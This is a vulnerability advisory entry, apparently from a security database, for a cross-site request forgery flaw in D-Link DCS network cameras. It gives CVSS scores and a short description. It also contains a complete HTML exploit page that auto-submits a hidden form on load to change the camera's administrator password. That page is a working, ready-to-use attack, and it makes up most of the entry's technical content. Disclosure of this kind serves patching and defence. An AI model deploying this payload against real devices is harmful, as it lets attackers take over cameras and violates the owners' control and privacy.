D-Link DCS series CSRF Change Admin Password

2012-10-10 / 2012-10-11
Risk: Low
Local: No
Remote: Yes
CWE: CWE-352


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Title: Dlink DCS series CSRF Change Admin Password Version: DCS-900, DCS-2000, DCS-5300 and possibly other. Date: 2012-02-22 Author: rigan - imrigan [sobachka] gmail.com -- Description: Dlink DCS is a series of network cameras. These cameras use a web interface which is prone to CSRF vulnerabilities. This flaw allows to change the administrator password. -- Exploit: <html> <body onload="javascript:document.forms[0].submit()"> <form method="POST" name="form0" action="http://your_target/setup/security.cgi"> <input type="hidden" name="rootpass" value="your_pass"/> <input type="hidden" name="confirm" value="your_pass"/> </form> </body> </html> --

References:

http://cxsecurity.com/issue/WLB-2012020202


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top